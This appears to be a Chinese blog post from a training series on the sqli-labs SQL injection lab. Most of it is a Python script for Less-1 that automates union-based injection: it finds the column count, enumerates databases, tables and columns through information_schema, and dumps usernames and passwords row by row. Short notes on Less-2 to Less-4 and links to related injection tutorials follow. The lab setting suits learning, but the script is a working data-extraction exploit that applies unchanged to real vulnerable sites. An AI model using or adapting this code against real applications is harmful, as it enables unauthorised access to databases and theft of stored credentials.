sqli1:

脚本

 # -*- coding: utf-8 -*-

 """

 Created on Sat Mar 23 09:37:14 2019

 @author: kenshin

 """

 import requests,re

 url = 'http://localhost/sqli-labs/Less-1/?id=-1'

 def Len_OrderBy(url):

     pattern_mark = 'Unknown column'

     #假设字段长20

     for i in range(1,20):

         url_new = url + "\' order by "+ str(i) +"--+"

         r = requests.get(url_new)

         if(re.findall(pattern_mark,r.text)):

             print('the lenght of column(order by) is :' + str(i-1) + "\n")

             break

     return i-1

 def get_DB(url,lenght):

     #注意:由此模式匹配到的是一个数量为1的列表,后续按','将数量拆分成n个,以便输出

     pattern_mark = 'Your Login name:(.+?)<br>'

     str = ''

     for i in range(1,lenght):

         str += 'group_concat(schema_name),'

     str += 'group_concat(schema_name)'

     payload = '\' union select ' + str +' from information_schema.schemata--+'

     url += payload

     r = requests.get(url)

     r = re.findall(pattern_mark,r.text)

     #list转str

     str_tmp = "".join(r)

     #re.split按','拆分

     lst = re.split(',',str_tmp)

     print('-'*9 + 'databases' + '-'*8)

     for s in lst:

         print('.' + s )

     print('-'*25)

 def get_TB(url,lenght,db):

     pattern_mark = 'Your Login name:(.+?)<br>'

     str = ''

     for i in range(1,lenght):

         str += 'group_concat(table_name),'

     str += 'group_concat(table_name)'

     payload = "\' union select "+ str +" from information_schema.tables where table_schema=\'" + db + "\'--+"

     url += payload

     r = requests.get(url)

     r = re.findall(pattern_mark,r.text)

     #list转str

     str_tmp = "".join(r)

     #re.split按','拆分

     lst = re.split(',',str_tmp)

     print('-'*9 +'Database '+ db +'\'s Tables' + '-'*8)

     for s in lst:

         print('.' + s )

     print('-'*35)

 def get_Column(url,lenght,tb):

     pattern_mark = 'Your Login name:(.+?)<br>'

     str = ''

     for i in range(1,lenght):

         str += 'group_concat(column_name),'

     str += 'group_concat(column_name)'

     payload = "\' union select " +str+ " from information_schema.columns where table_name=\'" +tb+ "\'--+"

     url += payload

     r = requests.get(url)

     r = re.findall(pattern_mark,r.text)

     #list转str

     str_tmp = ''.join(r)

     #re.split按','拆分

     lst = re.split(',',str_tmp)

     print('-'*9 +'Table '+ tb +'\'s Columns' + '-'*8)

     for s in lst:

         print('.' + s )

     print('-'*35)

 def get_data(url,lenght,tb,data):

     pattern_mark = 'Your Login name:(.+?)<br>'

     pattern_mark_pass = 'Your Password:(.+?)</font>'

     #if lenght=5

     #data=a,b,c

     #after expend

     #data=a,b,c,4,5

     #str to list

     lst = data.split(",")

     while len(lst) < lenght:

         lst.append(str(len(lst)+1))

     #list to str

     sn = ''

     for i in lst:

         sn += i+","

     #以上循环结果sn='a,b,c,'  c后的‘,’舍去才能构造正确payload

     sn=sn.rstrip(",")

     #格式化输出结果

     print('-'*9 +'Table '+ tb +'\'s All datas' + '-'*8)

     #假设最多有100组数据

     for i in range(1,100):

         payload = "\' union select "+ sn +" from "+ tb +" where id="+ str(i) +"--+"

         url_new = url + payload

         r = r_pass = requests.get(url_new)

         r = re.findall(pattern_mark,r.text)

         r_pass = re.findall(pattern_mark_pass,r_pass.text)

         print(str(r) +" "*(16-len(str(r)))+"=>  "+str(r_pass)+" "*(18-len(str(r_pass)))+"|")

         if (len(r)==0 and len(r_pass)==0):

             break

     print("-"*41)

 #字段长度

 lenght = Len_OrderBy(url)

 #所有数据库

 get_DB(url,lenght)

 #由库爆表

 db = input("select databases >> ")

 get_TB(url,lenght,db)

 #由表爆列

 tb = input("select table >> ")

 get_Column(url,3,tb)

 #由表和列名爆数据

 data = input("select columns (no more than " +str(lenght)+ ",and separate by ',') >> ")

 get_data(url,lenght,tb,data)

脚本 1

sqli2:

与sqli1比较,少了 ',对id没有经过处理。

sqli3:

对id经过了')处理

 sqli4:

对id经过了")处理

sqli-labs:1-4,基于报错的注入的更多相关文章

  1. sql注入--基于报错的注入

    这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学 ...

  2. Sqli labs系列-less-5&6 报错注入法(上)

    在我一系列常规的测试后发现,第五关和第六关,是属于报错注入的关卡,两关的区别是一个是单引号一个是双引号...当然我是看了源码的.... 基于报错注入的方法,我早就忘的差不多了,,,我记的我最后一次基于 ...

  3. Sqli labs系列-less-5&6 报错注入法(下)

    我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...

  4. 2019-9-9:渗透测试,基础学习,phpmyadmin getshell方法,基于时间的盲注,基于报错的注入,笔记

    phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-p ...

  5. mysql基于“报错”的注入

    报错是如何转为xss的? mysql语句在页面报错,泄露信息 ===================================================================== ...

  6. Mysql报错型注入总结

    Mysql注入虽然是老生常谈的问题,但是工作中更多的是使用sqlmap等工具进行注入测试的,原理方面还是不是很清楚,所以这段时间主要是自己搭建环境在学手工注入,简单的将自己的学习做一个总结和记录.在常 ...

  7. 基于报错的SQL注入整理

    SQLServer 一.利用错误消息提取信息 输入 'having 1=1 --(having一般要与group by一起来使用,group by是用来进行分组的,having后面是用来进行判断的), ...

  8. web安全之sql注入报错型注入

    前提: echo mysql_error(),输出错误信息. 熟悉的函数: floor()向下取整 concat()返回的字符串参数连接的结果 count()函数返回匹配指定条件的行数 rand()函 ...

  9. 实战记录之SQL server报错手工注入

    前言 最近测试了一个站点,这个站点挺有意思,发现没有关闭错误提示,初步猜测是SQL server数据库,后来验证确实是.在这里记录一下实战过程,并详细讲解一下用到的知识点. SQL server报错注 ...

随机推荐

  1. svn git 必须理解的概念

    不都是SCM代码管理嘛,有很大区别么?很多svn老鸟都是抱着这样的心态去学习git,然后无一幸免地陷入“查阅过很多资料,依然掌握不好”的困境,至少我们团队是这样的. 网上的资料确实已经很多了,却没有把 ...

  2. Functional and Class Components

    [Functional and Class Components] The simplest way to define a component is to write a JavaScript fu ...

  3. cdh 安装系列2--cdh manager product 安装

    前期准备工作: 准备三台centos7 地址分别为 192.168.20.163:192.168.20.162:192.168.20.161 用163这台机器链接外网,并安装manager以及mana ...

  4. Tomcat添加管理员role

       最近朋友问我怎么在Tomcat里面使用 admin 登录,一般情况下登录后是提示xxx的,经过百度后,好不容易才找到答案:    原来添加一个role为admin:<role rolena ...

  5. Android创建和删除桌面快捷方式

    有同学方反馈创建快捷方式后,点击快捷方式后不能启动程序或者提示"未安装程序",貌似是新的rom在快捷方式这块做过修改(由于此文是11年5月所出,估计应该是2.0或2.1的rom), ...

  6. php 两个值进行比较的问题

    php手册运算符中有介绍: 比较多种类型-- 如var_dump([ ] > 0); // 结果为true 运算数 1 类型 运算数 2 类型 结果 null 或 string string 将 ...

  7. pta l2-13(红色警报)

    题目链接:https://pintia.cn/problem-sets/994805046380707840/problems/994805063963230208 题意:给n个顶点,m条边,问每次删 ...

  8. POJ-3984.迷宫问题(BFS + 路径输出)

    昨天中午做的这道题,结果蛙了一整天,就因为一行代码困住了,今天算是见识到自己有多菜了.流泪.jpg 本题大意:给一个5 * 5的迷宫,1表示墙壁,0表示通路,从左上角走到右下角并输出路径. 本题思路: ...

  9. leecode 937 Reorder Log Files (模拟)

    传送门:点我 You have an array of logs.  Each log is a space delimited string of words. For each log, the ...

  10. 165. Compare Version Numbers (String)

    Compare two version numbers version1 and version2. If version1 > version2 return 1, if version1 & ...